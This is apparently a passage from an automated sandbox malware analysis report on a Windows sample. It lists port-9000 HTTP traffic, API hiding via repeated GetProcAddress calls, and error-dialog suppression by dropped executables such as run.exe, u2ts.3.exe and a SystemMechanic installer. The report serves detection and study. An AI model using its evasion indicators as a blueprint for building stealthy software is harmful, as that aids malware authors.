Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49805

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

Code function: 0_2_00408761 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00408761

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
